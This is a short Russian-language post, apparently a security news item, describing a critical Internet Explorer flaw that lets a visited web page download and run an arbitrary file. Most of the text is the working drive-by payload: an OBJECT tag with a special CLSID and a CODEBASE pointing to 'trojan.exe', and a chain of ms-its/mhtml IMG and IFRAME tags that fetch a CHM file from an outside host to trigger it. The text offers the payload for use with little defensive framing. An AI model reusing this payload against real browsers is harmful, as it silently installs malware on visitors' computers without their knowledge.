В IE обнаружена очередная критическая
ошибка. При помощи специального CLSID можно
загрузить на компьютер жертвы и выполнить
произвольный файл в случае, когда он просто
зайдет на сайт. Произойдет это естественно
без всякого вмешательства пользователя.
Реализовать это можно обозвав скрипт с
CLASSID файлом CHM.
Файл LAUNCH.HTML содержит:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123'
CODEBASE='trojan.exe'>
Для исполнения используем следующую
конструкцию:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>